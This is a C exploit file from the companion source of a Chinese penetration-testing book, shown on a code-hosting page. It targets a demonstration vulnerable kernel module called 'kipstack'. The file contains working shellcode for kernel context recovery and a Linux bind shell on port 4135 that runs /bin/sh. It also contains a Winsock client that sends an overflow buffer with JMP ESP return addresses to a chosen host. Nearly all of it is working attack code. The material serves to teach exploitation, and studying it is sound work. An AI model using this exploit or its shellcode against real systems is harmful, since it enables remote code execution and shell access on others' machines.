kipstack_exploit.c
来自「网络渗透技术配书源码」· C语言 代码 · 共 221 行
C
221 行
/* kipstack_expolit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对kipstack.c的利用程序
* gcc -o kipstack_expolit kipstack_expolit.c
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#define JMPESP (0xc0264364)
#define RETLOC2_OFFSET 22
#define EIP_OFFSET 0X10C
#define SHELLCODE_OFFSET (EIP_OFFSET+4)
#define RETLOC2 0xc01c38e0
unsigned char shellcode[] =
"\xb8\x00\xe0\xff\xff"
"\x21\xe7"
"\x81\xc7\x00\x07\x00\x00"
"\x89\xfd"
"\xe8\x00\x00\x00\x00"
"\x5e"
"\x81\xc6\x28\x00\x00\x00"
"\xb9\xcf\x00\x00\x00"
"\xf3\xa4"
"\xb8\xa8\x20\x2c\xc0"
"\xbb\x84\x24\x2c\xc0"
"\x8b\x08"
"\x89\x0b"
"\x89\x28"
"\x81\xc4\x20\x02\x00\x00"
"\x5b"
"\x5e"
"\x5d"
"\xc3"
"\x89\xe0"
"\x83\xc0\x04"
"\x8b\x18"
"\x83\xfb\x23"
"\x75\xf6"
"\x83\xe8\x04"
"\x8b\x08"
"\x81\xe1\x00\x00\x00\x08"
"\x81\xf9\x00\x00\x00\x08"
"\x75\x02"
"\xeb\x15"
"\x8b\x08"
"\x81\xe1\x00\x00\x00\x40"
"\x81\xf9\x00\x00\x00\x40"
"\x74\x05"
"\x83\xc0\x04"
"\xeb\xcc"
"\x89\xc4"
"\xbd\x00\xf0\xff\xbf"
"\x89\x28"
"\xb8\x00\xe0\xff\xff"
"\x21\xe0"
"\xc7\x80\x28\x01\x00\x00\x00\x00\x00\x00"
"\xeb\x1f"
"\x5e"
"\x89\xef"
"\xb9\x00\x04\x00\x00"
"\xf3\xa4"
"\xb8\xa8\x20\x2c\xc0"
"\xbb\x84\x24\x2c\xc0"
"\x8b\x0b"
"\x89\x08"
"\x6a\x2b"
"\x6a\x2b"
"\x07"
"\x1f"
"\xcf"
"\xe8\xdc\xff\xff\xff"
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x27\x10" // push word 4135
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\x10" // mov al, 16
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80" // int 80h
;
int main(int argc, void *argv[])
{
WSADATA wsd;
SOCKET s;
SOCKADDR_IN saddr;
int ret;
char sendbuff[1024];
short port;
int len;
int i;
printf("shellcode size is %d\n",sizeof(shellcode));
if(argc < 3)
{
printf("usage: %s host port\n", argv[0]);
return 1;
}
if(WSAStartup(MAKEWORD(2, 2), &wsd) != 0)
{
printf("WSAStartup failed\n");
return 1;
}
port=atoi(argv[2]);
s = socket(AF_INET, SOCK_DGRAM, 0);
if(s == INVALID_SOCKET)
{
printf("socket() failed: %d\n", WSAGetLastError());
return 1;
}
saddr.sin_family = AF_INET;
saddr.sin_port = htons(port);
if ((saddr.sin_addr.s_addr = inet_addr(argv[1]))== INADDR_NONE)
{
struct hostent *host=NULL;
host = gethostbyname(argv[1]);
if (host)
CopyMemory(&saddr.sin_addr, host->h_addr_list[0],
host->h_length);
else
{
printf("gethostbyname() failed: %d\n", WSAGetLastError());
WSACleanup();
return 1;
}
}
if (connect(s, (SOCKADDR *)&saddr, sizeof(saddr)) == SOCKET_ERROR)
{
printf("connect() failed: %d\n", WSAGetLastError());
WSACleanup();
return 1;
}
memset(sendbuff, 0x41, sizeof(sendbuff));
for (i=EIP_OFFSET;i>10;i-=4)
*(int *)&sendbuff[i] = JMPESP;
for (i=0;i<9;i++)
sendbuff[i]='B';
/*由于可能kipstack.c里面data的计算有点问题,导致了data数据指针多向后移动了8个字节,所以我们的EXPLOIT代码里面也要做相应的修改*/
memcpy(&sendbuff[SHELLCODE_OFFSET+8],shellcode,sizeof(shellcode));
*(int *)&sendbuff[EIP_OFFSET+8] = JMPESP;
len = SHELLCODE_OFFSET + sizeof(shellcode)+4+8;
printf("sending...\n");
ret = send(s, sendbuff, len, 0);
if (ret == SOCKET_ERROR)
{
printf("send() failed: %d\n", WSAGetLastError());
WSACleanup();
return 1;
}
closesocket(s);
WSACleanup();
return 0;
}
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?